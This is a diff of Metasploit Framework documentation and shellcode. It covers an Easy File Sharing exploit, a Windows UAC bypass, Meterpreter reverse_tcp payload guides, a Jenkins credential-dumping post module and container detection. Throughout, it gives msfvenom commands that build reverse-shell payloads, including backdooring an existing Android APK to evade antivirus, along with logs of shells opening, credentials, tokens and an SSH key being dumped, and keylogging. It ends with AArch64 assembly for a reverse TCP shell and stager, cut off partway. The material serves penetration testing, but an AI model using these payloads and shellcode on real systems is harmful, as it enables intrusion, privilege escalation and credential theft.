This module allows a remote attacker to execute a payload under the context of the user running the Easy File Sharing application
## Vulnerable Application
@ -10,7 +10,7 @@ This module allows a remote attacker to get a payload executed under the context
This module has been tested successfully on
* Easy File Sharing 7.2 on Windows XP En Sp3
* Easy File Sharing 7.2 on Windows XP En Sp3
Installers:
@ -18,11 +18,11 @@ Installers:
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploits/windows/http/easyfilesharing_post`
3. Do: `set rhosts [IP]`
4. Do: `exploit`
5. You should get your payload executed
1. Start `msfconsole`
2. Do: `use exploits/windows/http/easyfilesharing_post`
3. Do: `set rhosts [IP]`
4. Do: `exploit`
5. You should get your payload executed
## Scenarios
@ -32,11 +32,11 @@ msf > use exploit/windows/http/easyfilesharing_post
msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easyfilesharing_post) > exploit
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200
meterpreter > sysinfo
Computer : MM
OS : Windows XP (Build 2600, Service Pack 3).
@ -47,7 +47,7 @@ Logged On Users : 2
Meterpreter : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
msf exploit(easyfilesharing_post) >
```

115
documentation/modules/exploit/windows/local/bypassuac_comhijack.md Normal file
View File

@ -0,0 +1,115 @@
## Intro
This module will bypass UAC on Windows 7 through to 10 RS3 by hijacking a COM Class ID
that is located in the current user hive. This key contains a reference to a DLL that
contains a chosen payload. Multiple COM vectors are defined in this module and one is
chosen at random at runtime.
The module modifies the registry in order for this exploit to work. The modification is
reverted once the exploitation attempt has finished.
This module requires that the payload architecture matches the target operating system
architecture. This is due to the fact that the underlying binaries that are invoked
match the system architecture.
If a custom DLL is to be used with `EXE::Custom`, that DLL must match the system
architecture, and should call `ExitProcess()` after starting the payload in a
different process.
## Usage
1. Create a session on the target system under the context of a local administrative user.
1. Begin interacting with the module: `use exploit/windows/local/bypassuac_comhijack`.
1. Set the `PAYLOAD` and configure it correctly, making sure the architecture is correct.
1. If an existing handler is configured to receive the elevated session, then the module's
handler should be disabled: `set DisablePayloadHandler true`.
1. Make sure that the `SESSION` value is set to the existing session identifier.
1. Invoke the module: `run`.
## Scenario
```
msf exploit(bypassuac_comhijack) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-5A73R51\oj @ DESKTOP-5A73R51 xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)
msf exploit(bypassuac_comhijack) > sessions -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : DESKTOP-5A73R51
OS : Windows 10 (Build 14393).
Architecture : x64
System Language : en_AU
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(bypassuac_comhijack) > options
Module options (exploit/windows/local/bypassuac_comhijack):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST xxx.xx.255.1 yes The listen address
LPORT 8443 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(bypassuac_comhijack) > run
[*] [2017.08.16-12:58:31] UAC is Enabled, checking level...
[+] [2017.08.16-12:58:31] Part of Administrators group! Continuing...
[+] [2017.08.16-12:58:32] UAC is set to Default
[+] [2017.08.16-12:58:32] BypassUAC can bypass this setting, continuing...
[*] [2017.08.16-12:58:33] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] [2017.08.16-12:58:33] Uploading payload to C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll ...
[*] [2017.08.16-12:58:33] Executing high integrity process ...
[*] [2017.08.16-12:58:34] Sending stage (1188415 bytes) to xxx.xx.255.159
[*] Meterpreter session 2 opened (xxx.xx.255.1:8443 -> xxx.xx.255.159:51480) at 2017-08-16 12:58:35 +1000
[*] [2017.08.16-12:58:38] Cleaining up registry ...
[!] [2017.08.16-12:58:39] This exploit may require manual cleanup of 'C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll' on the target
msf exploit(bypassuac_comhijack) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-5A73R51\oj @ DESKTOP-5A73R51 xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)
2 meterpreter x64/windows DESKTOP-5A73R51\oj @ DESKTOP-5A73R51 xxx.xx.255.1:8443 -> xxx.xx.255.159:51480 (xxx.xx.255.159)
msf exploit(bypassuac_comhijack) > sessions -1
[*] Starting interaction with 2...
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

10
documentation/modules/payload/android/meterpreter/reverse_tcp.md
View File

@ -47,6 +47,16 @@ To create the APK with msfvenom:
./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
```
You can also add Android meterpreter to any existing APK. This will make it harder for
Anti-virus software to detect the payload, and allow you read internal files and take
screenshots of the Android app you are backdooring:
```
./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
```
Next, start an Android device. Upload the APK, and execute it. There are different ways to do this,
so please refer to the Scenarios section for more information.

10
documentation/modules/payload/linux/x86/meterpreter/reverse_tcp.md
View File

@ -61,7 +61,7 @@ To use linux/x86/meterpreter/reverse_tcp as an executable, first you can generat
./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f elf -o /tmp/payload.bin
```
Before sending the exectauble to the victim machine, you need to set up the handler on your end:
Before sending the executable to the victim machine, you need to set up the handler on your end:
1. Start msfconsole
2. Do: ```use exploit/multi/handler```
@ -69,7 +69,7 @@ Before sending the exectauble to the victim machine, you need to set up the hand
4. Do: ```set LHOST [Your IP]```
5. Do: ```run```
And that should start the listener. When the victim runs the malicious exectauble, you should
And that should start the listener. When the victim runs the malicious executable, you should
receive a session:
```
@ -143,7 +143,7 @@ interfaces on the remote machine.
**getuid**
The getuid command tells you the current user that Meterpreter is running on. For example:
The ```getuid``` command tells you the current user that Meterpreter is running on. For example:
```
meterpreter > getuid
@ -166,7 +166,7 @@ The ```ps``` command lists the running processes on the remote machine.
**shell**
The shell command allows you to interact with the remote machine's terminal (or shell). For
The ```shell``` command allows you to interact with the remote machine's terminal (or shell). For
example:
```
@ -180,7 +180,7 @@ If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel.
**sysinfo**
The sysinfo command shows you basic information about the remote machine. Such as:
The ```sysinfo``` command shows you basic information about the remote machine. Such as:
* Computer name
* OS name

183
documentation/modules/payload/osx/x64/meterpreter/reverse_tcp.md Normal file
View File

@ -0,0 +1,183 @@
osx/x64/meterpreter_reverse_tcp is similar to the linux meterpreter, but built for OSX.
It allows you to remotely take over the compromised system, having control of the file system,
webcam, microphone, screenshot and collect sensitive information such as credentials
using post modules, etc.
## Vulnerable Application
osx/x64/meterpreter_reverse_tcp 64-bit MacOSX platforms from 10.8 onwards.
## Deploying osx/x64/meterpreter_reverse_tcp
To use osx/x64/meterpreter_reverse_tcp as an executable, first you can generate it with msfvenom:
```
./msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=[IP] LPORT=4444 -f macho -o /tmp/payload.bin
```
Before sending the executable to the victim machine, you need to set up the handler on your end:
1. Start msfconsole
2. Do: ```use exploit/multi/handler```
3. Do: ```set PAYLOAD osx/x64/meterpreter_reverse_tcp```
4. Do: ```set LHOST [Your IP]```
5. Do: ```run```
And that should start the listener. When the victim runs the malicious executable, you should
receive a session:
```
msf exploit(handler) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.23.1:4444
msf exploit(handler) > [*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.182:45009) at 2017-08-08 12:34:49 +0800
msf exploit(handler) > sessions 1
[*] Starting interaction with 1...
meterpreter >
```
## Important Basic Commands
Here is a list of some of the common commands you might need while using Meterpreter:
**pwd**
The ```pwd``` command tells you the current working directory. For example:
```
meterpreter > pwd
/Users/User/Desktop
```
**cd**
The ```cd``` command allows you to change directories. Example:
```
meterpreter > cd /tmp
```
**cat**
The ```cat``` command allows you to see the content of a file:
```
meterpreter > cat /tmp/data.txt
hello world
```
**upload**
The ```upload``` command allows you to upload a file to the remote target. For example:
```
meterpreter > upload /tmp/data.bin /Users/User/Desktop
[*] uploading : /tmp/data.bin -> /Users/User/Desktop
[*] uploaded : /tmp/data.bin -> /Users/User/Desktop/data.bin
meterpreter >
```
**download**
The ```download``` command allows you to download a file from the remote target to your machine. For example:
```
meterpreter > download /Users/User/Desktop/data.bin /tmp
[*] downloading: /Users/User/Desktop/data.bin -> /tmp/data.bin
[*] download : /Users/User/Desktop/data.bin -> /tmp/data.bin
```
**ifconfig/ipconfig**
```ifconfig``` and ```ipconfig``` are actually the same thing. They allow you to see the network
interfaces on the remote machine.
**getuid**
The ```getuid``` command tells you the current user that Meterpreter is running on. For example:
```
meterpreter > getuid
Server username: uid=502, gid=20, euid=502, egid=20
```
**execute**
The ```execute``` command allows you to execute a command or file on the remote machine.
For example:
```
meterpreter > execute -f echo -a "hello > /tmp/hello.txt"
Process 5292 created.
```
**ps**
The ```ps``` command lists the running processes on the remote machine.
**shell**
The ```shell``` command allows you to interact with the remote machine's terminal (or shell). For
example:
```
meterpreter > shell
Process 29335 created.
Channel 2 created.
cat /tmp/hello.txt
hello
exit
meterpreter >
```
If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel or
[CTRL]+[Z] then y (or the exit command) to terminate the channel.
**sysinfo**
The ```sysinfo``` command shows you basic information about the remote machine. Such as:
* Computer name
* OS name
* Architecture
* Meterpreter type
For example:
```
meterpreter > sysinfo
Computer : My-Computer.local
OS : Mac OS X Sierra (MacOSX 10.12.6)
Architecture : x86
Meterpreter : x64/osx
meterpreter >
```
**Extensions**
OSX Meterpreter supports reading and writing to the clipboard with the extapi extension,
you can load it with the ```load``` command:
```
meterpreter > load extapi
Loading extension extapi...Success.
meterpreter > clipboard_get_data
Text captured at
=================
pa$$w0rd
=================
```
**Other commands**
For a complete list of OSX Meterpreter commands, do the following at the prompt:
```
meterpreter > help
```

38
documentation/modules/payload/windows/meterpreter/reverse_tcp.md
View File

@ -90,7 +90,7 @@ For example:
meterpreter > download C:\\Users\\user\\Desktop\\something.txt /tmp/
[*] downloading: C:\Users\user\Desktop\something.txt -> /tmp//something.txt
[*] download : C:\Users\user\Desktop\something.txt -> /tmp//something.txt
meterpreter >
meterpreter >
```
The ```-r``` option for the command also allows you to download recursively.
@ -154,7 +154,7 @@ Process 2076 created.
To pass an argument, use the ```-a``` flag:
```
meterpreter > execute -f iexplore.exe -a http://metasploit.com
meterpreter > execute -f iexplore.exe -a https://metasploit.com
Process 2016 created.
```
@ -194,7 +194,7 @@ System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
meterpreter >
meterpreter >
```
**keyscan_start**
@ -283,7 +283,7 @@ repeatedly, you can use the auto_win32_multihandler.rc resource script in Metasp
First, run the resource script:
```
$ ./msfconsole -q -r scripts/resource/auto_win32_multihandler.rc
$ ./msfconsole -q -r scripts/resource/auto_win32_multihandler.rc
[*] Processing scripts/resource/auto_win32_multihandler.rc for ERB directives.
[*] resource (scripts/resource/auto_win32_multihandler.rc)> Ruby Code (776 bytes)
lhost => 192.168.1.199
@ -297,9 +297,9 @@ lport => 4444
exitonsession => false
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.199:4444
[*] Started reverse TCP handler on 192.168.1.199:4444
[*] Starting the payload handler...
msf exploit(handler) >
msf exploit(handler) >
```
Next, go to your ~/.msf4/local directory, you should see meterpreter_reverse_tcp.exe in there.
@ -315,7 +315,7 @@ from popular applications and enumerate or modify system settings.
To use a post module from the Meterpreter prompt, simply use the ```run``` command:
```
meterpreter > run post/windows/gather/checkvm
meterpreter > run post/windows/gather/checkvm
[*] Checking if WIN-6NH0Q8CJQVM is a Virtual Machine .....
[*] This is a VMware Virtual Machine
@ -336,7 +336,7 @@ To begin, load the extension:
```
meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter >
meterpreter >
```
This will create more commands for the Meterpreter prompt. Most of them are meant to be used to
@ -387,7 +387,7 @@ To begin, at the Meterpreter prompt, do:
```
meterpreter > load extapi
Loading extension extapi...success.
meterpreter >
meterpreter >
```
One great feature of the extension is clipboard management. The Windows clipboard is interesting
@ -412,7 +412,7 @@ Text captured at 2016-03-05 19:13:39.0170
hello, world!!
=========================================
meterpreter >
meterpreter >
```
The limitation of this command is that since you're only grabbing whatever is in the clipboard at
@ -422,7 +422,7 @@ whatever goes in there. To start, issue the following command:
```
meterpreter > clipboard_monitor_start
[+] Clipboard monitor started
meterpreter >
meterpreter >
```
While it is monitoring, you can ask Meterpreter to dump whatever's been captured.
@ -444,7 +444,7 @@ download : C:\Users\user\Desktop\cat_pic.png -> ./cat_pic.png
==========================================
[+] Clipboard monitor dumped
meterpreter >
meterpreter >
```
The ```clipboard_monitor_stop``` command will also dump the captured data, and then exit.
@ -471,7 +471,7 @@ meterpreter > python_execute "x = 'hello world'; print x"
[+] Content written to stdout:
hello world
meterpreter >
meterpreter >
```
Another way to execute Python code is from a local file by using the ```python_import``` command.
@ -503,13 +503,13 @@ To learn more about the Python extension, please read this [wiki](https://github
**Network Pivoting**
There are three mains ways that you can use for moving around inside a network:
There are three mains ways that you can use for moving around inside a network:
- The route command in the msf prompt
- The route command in the the Meterpreter prompt
- The portfwd command
***Routing through msfconsole***
***Routing through msfconsole***
The route command from the msf prompt allows you connect to hosts on a different network through the compromised machine. You should be able to determine that by looking at the compromised machine's ipconfig:
@ -547,7 +547,7 @@ IPv4 Netmask : 255.255.255.255
...
```
The example above shows that we have a Meterpreter connection to 192.168.1.201. Let's call this box A, and it is connected to the 192.100.0.0/24 VPN network. As an attacker, we aren't connected to this network directly, but we can explore that network through box A.
The example above shows that we have a Meterpreter connection to 192.168.1.201. Let's call this box A, and it is connected to the 192.100.0.0/24 VPN network. As an attacker, we aren't connected to this network directly, but we can explore that network through box A.
At the msf prompt, do:
@ -566,7 +566,7 @@ msf auxiliary(smb_version) > run
[*] 192.100.0.101:445 - 192.100.0.101:445 is running Windows 2003 SP2 (build:3790) (name:SINN3R-QIXN9TA2) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_version) >
msf auxiliary(smb_version) >
```
Another neat trick using route is that you can also bypass the compromised host's firewall this way. For example, if the host has HTTP open, but SMB is blocked by the firewall, you can try to compromise it via HTTP first. You'll need to use the route command to talk to SMB and then try to exploit SMB.
@ -628,7 +628,7 @@ The timeout control basically defines the life span of Meterpreter. To configure
```set_timeouts``` command:
```
meterpreter > set_timeouts
meterpreter > set_timeouts
Usage: set_timeouts [options]
Set the current timeout options.
@ -671,7 +671,7 @@ meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>>
>>
```
**The client object**

6
documentation/modules/post/hardware/automotive/getvinfo.md
View File

@ -24,7 +24,11 @@ PIDs to ASCII.
**CLEAR_DTCS***
If any Diagnostic Trouble Codes (DTCs) are present it will clear those and reset the MIL (Enginge Light)
If any Diagnostic Trouble Codes (DTCs) are present it will clear those and reset the MIL (Engine Light).
**PADDING**
Optional byte-value to use for padding all CAN bus packets to an 8-byte length. Padding is disabled by default.
## Scenarios

76
documentation/modules/post/linux/gather/checkcontainer.md Normal file
View File

@ -0,0 +1,76 @@
## Indicators
There are several indicators that a process is being executed inside of a container. This module looks for the following indicators:
1. Presence of `/.dockerenv` file indicates Docker.
2. Finding select strings in `/proc/1/cgroup` indicates LXC or Docker.
3. The value of the `container` environment variable in `/proc/1/environ` indicates LXC or systemd nspawn.
## Verification Steps
1. Start msfconsole
2. Get a session via exploit of your choice
3. `run post/linux/gather/checkcontainer`
4. You should get feedback if a container was detected
## Options
**SESSION**
Which session to use, which can be viewed with `sessions -l`
## Scenarios
Check if the jenkins instance you have a shell on is running inside a Docker container.
```
msf > use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set API_TOKEN bc3dbc5c328733cc826c15772e6eaef5
API_TOKEN => bc3dbc5c328733cc826c15772e6eaef5
msf exploit(jenkins_script_console) > set RHOST 10.0.0.40
RHOST => 10.0.0.40
msf exploit(jenkins_script_console) > set RPORT 8080
RPORT => 8080
msf exploit(jenkins_script_console) > set TARGETURI /
TARGETURI => /
msf exploit(jenkins_script_console) > set TARGET 1
TARGET => 1
msf exploit(jenkins_script_console) > set USERNAME user
USERNAME => user
msf exploit(jenkins_script_console) > run
[*] Started reverse TCP handler on 10.0.0.49:4444
[*] Checking access to the script console
[*] Authenticating with token...
[*] Using CSRF token: 'b83d12171ba5248100f1de20e6472067' (Jenkins-Crumb style)
[*] 10.0.0.40:8080 - Sending Linux stager...
[*] Sending stage (826840 bytes) to 10.0.0.40
[*] Meterpreter session 1 opened (10.0.0.49:4444 -> 10.0.0.40:54404) at 2017-08-16 20:56:23 -0500
[!] Deleting /tmp/aFdmPcC payload file
meterpreter > run post/linux/gather/checkcontainer
[+] This appears to be a 'Docker' container
meterpreter >
```
Detect a LXC container
```
meterpreter > run post/linux/gather/checkcontainer
[+] This appears to be a 'LXC' container
meterpreter >
```
Detect a systemd nspawn container
```
meterpreter > run post/linux/gather/checkcontainer
[+] This appears to be a 'systemd nspawn' container
meterpreter >
```
Detect nothing
```
meterpreter > run post/linux/gather/checkcontainer
[*] This does not appear to be a container
meterpreter >
```

206
documentation/modules/post/multi/gather/jenkins_gather.md Normal file
View File

@ -0,0 +1,206 @@
## Vulnerable Application
Official Source:
[Jenkins](https://jenkins.io/download/)
This module has been verified against:
1. Jenkins 2.67 on Ubuntu 16.04 in Docker
1. Jenkins 2.67 on Windows 7 SP 1
1. Jenkins 2.60.1
1. Jenkins 1.56
## Verification Steps
1. Set up Jenkins to obtain a shell (use Docker for quick setup)
1. Run `docker run -p 8080:8080 -p 50000:50000 jenkins`
1. Use the default setup and install "suggested plugins"
1. Create new user admin, add a user or credential (via Manage Jenkins)
1. Start msfconsole
1. We'll use the `jenkins_script_console` module to quickly gain a shell
1. Do: ```use exploit/multi/http/jenkins_script_console```
1. Do: ```set RHOST 172.17.0.1```
1. Do: ```set RPORT 8080```
1. Do: ```set TARGETURI /```
1. Do: ```set USERNAME admin```
1. Do: ```set PASSWORD or set API_TOKEN```
1. Do: ```set TARGET 1```
1. Do: ```set PAYLOAD linux/x86/meterpreter/reverse_tcp```
1. Do: ```set LHOST 192.168.56.105```
1. Do: ```exploit -j```
1. Do: ```use post/multi/gather/jenkins_gather```
1. Do: ```set SESSION 1```
1. Do: ```run```
1. You should see the saved credentials output
## Options
**SEARCH_JOBS**
This option searches through the `jobs` folder for interesting
keywords but obviously increases runtime on larger instances.
**STORE_LOOT**
This option saves interesting files and loot to disk. If set to
false will simply output data to console.
## Scenarios
**Jenkins on Windows**
```
msf post(jenkins_gather) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
18 shell x86/linux 192.168.56.105:4444 -> 192.168.56.1:58828 (172.17.0.1)
20 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 192.168.56.105:4444 -> 192.168.56.1:58974 (172.17.0.2)
21 meterpreter x86/windows NT AUTHORITY\SYSTEM @ kali 192.168.56.105:4444 -> 192.168.56.101:50427 (192.168.56.101)
23 shell x86/windows 192.168.56.105:4444 -> 192.168.56.101:50793 (192.168.56.101)
msf post(jenkins_gather) > info
Name: Jenkins Credential Collector
Module: post/multi/gather/jenkins_gather
Platform: Linux, Windows
Arch:
Rank: Normal
Provided by:
thesubtlety
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SEARCH_JOBS true no Search through job history logs for interesting keywords. Increases runtime.
SESSION 17 yes The session to run this module on.
STORE_LOOT true no Store files in loot (will simply output file to console if set to false).
Description:
This module can be used to extract saved Jenkins credentials, user
tokens, SSH keys, and secrets. Interesting files will be stored in
loot along with combined csv output.
msf post(jenkins_gather) > run
[*] Searching for Jenkins directory... This could take some time...
[*] Found Jenkins installation at C:\Program Files\Jenkins
[+] Credentials found - Username: user1 Password: Password123456
[+] SSH Key found! ID: 83c6a18f-6b35-420a-8534-cc505c3347b5 Passphrase: secretpassphrase123 Username: sshkey1 Description: interesting description
[+] Job Info found - Job Name: User: testpass Password: secretpass123
[+] Job Info found - Job Name: User: testpass Password: ohwowosupersecret
[+] Node Info found - Name: test Host: hostnode1.lab.local Port: 22 CredID: 972fc428-dd7c-46ea-a119-be78ae0866ad
[+] API Token found - Username: admin Token: 8a114e0fa48c1a489c39b98e94c986c8
[+] API Token found - Username: useruseruser Token: 6810c3f6ccca939ac2a8b8ac4b9de012
[*] Searching through job history for interesting bits...
[+] Job Log truffles:
C:\Program Files\Jenkins\jobs\asdf\builds\4\log:C:\Program Files\Jenkins\workspace\asdf>echo "secret is secret"
C:\Program Files\Jenkins\jobs\asdf\builds\4\log:"secret is secret"
...
C:\Program Files\Jenkins\jobs\asdf\lastSuccessful\log:C:\Program Files\Jenkins\workspace\asdf>echo "secret is secret"
C:\Program Files\Jenkins\jobs\asdf\lastSuccessful\log:"secret is secret"
[+]
Creds
=====
Username Password Description
-------- -------- -----------
testpass secretpass123
testpass ohwowosupersecret
user1 Password123456
[+]
API Keys
========
Username API Tokens
-------- ----------
admin 8a114e0fa48c1a489c39b98e94c986c8
useruseruser 6810c3f6ccca939ac2a8b8ac4b9de012
[+]
Nodes
=====
Node Name Hostname Port Description Cred Id
--------- -------- ---- ----------- -------
test hostnode1.lab.local 22 testtesttest 972fc428-dd7c-46ea-a119-be78ae0866ad
[+] SSH Key
[*] ID: 83c6a18f-6b35-420a-8534-cc505c3347b5
[*] Description: interesting description
[*] Passphrase: secretpassphrase123
[*] Username: sshkey1
[*]
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAuTfL0ijR0JDLTQC092ZolnkTJGRi7YQInK/K1ZFDFc44JOSU
...snip...
7Ad+Ja6+51ECnXJIFKPj7binB6/C10YVqHh4KON3DeA6ZA7ZpUko
-----END RSA PRIVATE KEY-----
[*] Post module execution completed
```
**Jenkins 2.67 on Ubuntu 16.04**
```
msf post(jenkins_gather) > set session 20
session => 18
msf post(jenkins_gather) > info
Name: Jenkins Credential Collector
Module: post/multi/gather/jenkins_gather
Platform: Linux, Windows
Arch:
Rank: Normal
Provided by:
thesubtlety
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SEARCH_JOBS true no Search through job history logs for interesting keywords. Increases runtime.
SESSION 17 yes The session to run this module on.
STORE_LOOT true no Store files in loot (will simply output file to console if set to false).
Description:
This module can be used to extract saved Jenkins credentials, user
tokens, SSH keys, and secrets. Interesting files will be stored in
loot along with combined csv output.
msf post(jenkins_gather) > run
[*] Searching for Jenkins directory... This could take some time...
[*] Found Jenkins installation at /root/.jenkins
[+] Credentials found - Username: thanksforthefish Password: whatagreatbook
[+] API Token found - Username: user1 Token: 859e1d6ee6ab85804434fa5395ab962d
[+] API Token found - Username: admin Token: 9da706c125a4b5a4c19b1f799723175c
[*] Searching through job history for interesting bits...
[+]
Creds
=====
Username Password Description
-------- -------- -----------
thanksforthefish whatagreatbook
[+]
API Keys
========
Username API Tokens
-------- ----------
admin 9da706c125a4b5a4c19b1f799723175c
user1 859e1d6ee6ab85804434fa5395ab962d
[*] Post module execution completed
```

13
modules/post/windows/manage/archmigrate.md → documentation/modules/post/windows/manage/archmigrate.md
View File

@ -1,5 +1,6 @@
## Creating A Testing Environment
To use this module you need an x86 executable type meterpreter on a x64 windows machine.
To use this module you need an x86 executable type meterpreter on a x64 windows machine.
This module has been tested against:
@ -23,9 +24,10 @@ This module was not tested against, but may work against:
### Windows 10 x64
```
msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567
[*] Started reverse TCP handler on <MSF_IP>:4567
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:50917) at 2017-03-22 11:43:42 -0500
@ -39,8 +41,8 @@ This module was not tested against, but may work against:
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/archmigrate
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/archmigrate
msf post(archmigrate) > set session 1
session => 1
msf post(archmigrate) > run
@ -70,4 +72,5 @@ This module was not tested against, but may work against:
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
Meterpreter : x64/windows
```

2
documentation/modules/post/windows/manage/priv_migrate.md
View File

@ -56,7 +56,7 @@ set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.1.101
set LPORT 13002
set ExitOnSession false
set AutoRunScript multi_console_command -rc /home/user/auto.rc
set AutoRunScript multi_console_command -r /home/user/auto.rc
exploit -j
```

72
external/source/shellcode/linux/aarch64/single_reverse_tcp_shell.s vendored Normal file
View File

@ -0,0 +1,72 @@
.equ SYS_SOCKET, 0xc6
.equ SYS_CONNECT, 0xcb
.equ SYS_DUP3, 0x18
.equ SYS_EXECVE, 0xdd
.equ SYS_EXIT, 0x5d
.equ AF_INET, 0x2
.equ SOCK_STREAM, 0x1
.equ STDIN, 0x0
.equ STDOUT, 0x1
.equ STDERR, 0x2
.equ IP, 0x0100007f
.equ PORT, 0x5C11
_start:
// sockfd = socket(AF_INET, SOCK_STREAM, 0)
mov x0, AF_INET
mov x1, SOCK_STREAM
mov x2, 0
mov x8, SYS_SOCKET
svc 0
mov x3, x0
// connect(sockfd, (struct sockaddr *)&server, sockaddr_len)
adr x1, sockaddr
mov x2, 0x10
mov x8, SYS_CONNECT
svc 0
cbnz w0, exit
// dup3(sockfd, STDIN, 0) ...
mov x0, x3
mov x2, 0
mov x1, STDIN
mov x8, SYS_DUP3
svc 0
mov x1, STDOUT
mov x8, SYS_DUP3
svc 0
mov x1, STDERR
mov x8, SYS_DUP3
svc 0
// execve('/system/bin/sh', NULL, NULL)
adr x0, shell
mov x2, 0
str x0, [sp, 0]
str x2, [sp, 8]
mov x1, sp
mov x8, SYS_EXECVE
svc 0
exit:
mov x0, 0
mov x8, SYS_EXIT
svc 0
.balign 4
sockaddr:
.short AF_INET
.short PORT
.word IP
shell:
.word 0x00000000
.word 0x00000000
.word 0x00000000
.word 0x00000000
end:

44
external/source/shellcode/linux/aarch64/stage_shell.s vendored Normal file
View File

@ -0,0 +1,44 @@
.equ SYS_DUP3, 0x18
.equ SYS_EXECVE, 0xdd
.equ SYS_EXIT, 0x5d
.equ STDIN, 0x0
.equ STDOUT, 0x1
.equ STDERR, 0x2
_start:
/* dup3(sockfd, STDIN, 0) ... */
mov x0, x12
mov x2, 0
mov x1, STDIN
mov x8, SYS_DUP3
svc 0
mov x1, STDOUT
mov x8, SYS_DUP3
svc 0
mov x1, STDERR
mov x8, SYS_DUP3
svc 0
/* execve('/system/bin/sh', NULL, NULL) */
adr x0, shell
mov x2, 0
str x0, [sp, 0]
str x2, [sp, 8]
mov x1, sp
mov x8, SYS_EXECVE
svc 0
exit:
mov x0, 0
mov x8, SYS_EXIT
svc 0
.balign 4
shell:
.word 0x00000000
.word 0x00000000
.word 0x00000000
.word 0x00000000
end:

94
external/source/shellcode/linux/aarch64/stager_sock_reverse.s vendored Normal file
View File

@ -0,0 +1,94 @@
.equ SYS_SOCKET, 0xc6
.equ SYS_CONNECT, 0xcb
.equ SYS_READ, 0x3f
.equ SYS_MMAP, 0xde
.equ SYS_EXIT, 0x5d
.equ AF_INET, 0x2
.equ SOCK_STREAM, 0x1
.equ STDIN, 0x0
.equ STDOUT, 0x1
.equ STDERR, 0x2
.equ IP, 0x0100007f
.equ PORT, 0x5C11
start:
/* sockfd = socket(AF_INET, SOCK_STREAM, 0) */
mov x0, AF_INET
mov x1, SOCK_STREAM
mov x2, 0
mov x8, SYS_SOCKET
svc 0
mov x12, x0
/* connect(sockfd, (struct sockaddr *)&server, sockaddr_len) */
adr x1, sockaddr
mov x2, 0x10
mov x8, SYS_CONNECT
svc 0
cbnz w0, failed
/* read(sockfd, buf='x1', nbytes=4) */
mov x0, x12
sub sp, sp, #16
mov x1, sp
mov x2, #4
mov x8, SYS_READ
svc 0
cbz w0, failed
ldr x2, [sp,#0]
/* Page-align, assume <4GB */
lsr x2, x2, #12
add x2, x2, #1
lsl x2, x2, #12
/* mmap(addr=0, length='x2', prot=7, flags=34, fd=0, offset=0) */
mov x0, xzr
mov x1, x2
mov x2, #7
mov x3, #34
mov x4, xzr
mov x5, xzr
/* call mmap() */
movi x8, SYS_MMAP
svc 0
/* Grab the saved size, save the address */
ldr x4, [sp]
/* Save the memory address */
str x0, [sp]
/* Read in all of the data */
mov x3, x0
read_loop:
/* read(sockfd, buf='x3', nbytes='x4') */
mov x0, x12
mov x1, x3
mov x2, x4
